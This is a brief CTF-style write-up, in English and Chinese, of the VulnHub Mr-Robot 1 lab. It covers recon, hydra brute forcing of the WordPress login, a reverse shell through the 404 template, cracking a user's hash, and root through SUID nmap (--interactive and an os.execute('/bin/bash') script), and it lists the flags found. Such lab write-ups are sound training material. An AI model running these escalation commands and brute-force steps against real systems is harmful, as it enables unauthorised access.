oscp-vulnhub-Mr-Robot 1 - My-oscp-all-things

### information_gathering port:443 80 ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609000513257-ef58b5b4-bcf4-41c3-97d4-442a527479d3.png#align=left&display=inline&height=317&margin=%5Bobject%20Object%5D&name=image.png&originHeight=634&originWidth=664&size=215534&status=done&style=none&width=332) find robots.txt and get hash and a dict ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609000619048-65118fb1-38c4-4b0e-bf52-868d0b4669ff.png#align=left&display=inline&height=81&margin=%5Bobject%20Object%5D&name=image.png&originHeight=161&originWidth=507&size=15339&status=done&style=none&width=253.5) flag1: ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609000734914-5ef29e9c-becd-4963-8ff1-e4a7019b9a22.png#align=left&display=inline&height=54&margin=%5Bobject%20Object%5D&name=image.png&originHeight=108&originWidth=562&size=12992&status=done&style=none&width=281) 073403c8a58a1f80d943455fb30724b9 ### Establish a foothold username通过猜测为ELLiot,因为mr robot电视剧中主角robot的真名叫艾略特密码通过hydra http-post-form可爆破为： ER28-0652 改变模板404页面反弹个shell ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609002096236-a184c59c-4139-4665-8092-667212701784.png#align=left&display=inline&height=256&margin=%5Bobject%20Object%5D&name=image.png&originHeight=512&originWidth=906&size=117138&status=done&style=none&width=453) ->key2 permission denied pass->robot c3fcd3d76192e4007dfb496cca67e13b ->abcdefghijklmnopqrstuvwxyz 解密出来后登录读取拿到flag2 login->robot to get key-2 is 822c73956184f694993bede3eb39f959 ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609002301156-b380bb3f-9be4-4c37-b0f5-89deb106def8.png#align=left&display=inline&height=103&margin=%5Bobject%20Object%5D&name=image.png&originHeight=206&originWidth=373&size=36420&status=done&style=none&width=186.5) ### privilege: #### ways1 ``` find / -perm -4000 -type f 2>/dev/null ``` ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609002346442-1884ad2e-0ec2-401f-8af1-87c21776bed1.png#align=left&display=inline&height=155&margin=%5Bobject%20Object%5D&name=image.png&originHeight=309&originWidth=479&size=46231&status=done&style=none&width=239.5) nmap 在低版本中可直接用--interactive 进入交互界面，此处可用来提权 ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609002378590-834d9dba-5631-46ed-9be8-3cd2f291ac3d.png#align=left&display=inline&height=230&margin=%5Bobject%20Object%5D&name=image.png&originHeight=460&originWidth=678&size=159375&status=done&style=none&width=339) ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609002469057-8c89af3c-af25-49ff-a4dd-7792b75cf659.png#align=left&display=inline&height=154&margin=%5Bobject%20Object%5D&name=image.png&originHeight=307&originWidth=627&size=61113&status=done&style=none&width=313.5) ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609002493313-8e9fbc08-b72b-4fb0-81b7-9f78db8951ed.png#align=left&display=inline&height=143&margin=%5Bobject%20Object%5D&name=image.png&originHeight=285&originWidth=664&size=44826&status=done&style=none&width=332) #### ways2 可直接script ``` echo "os.execute('/bin/bash')" > ./exp nmap --script=./exp ```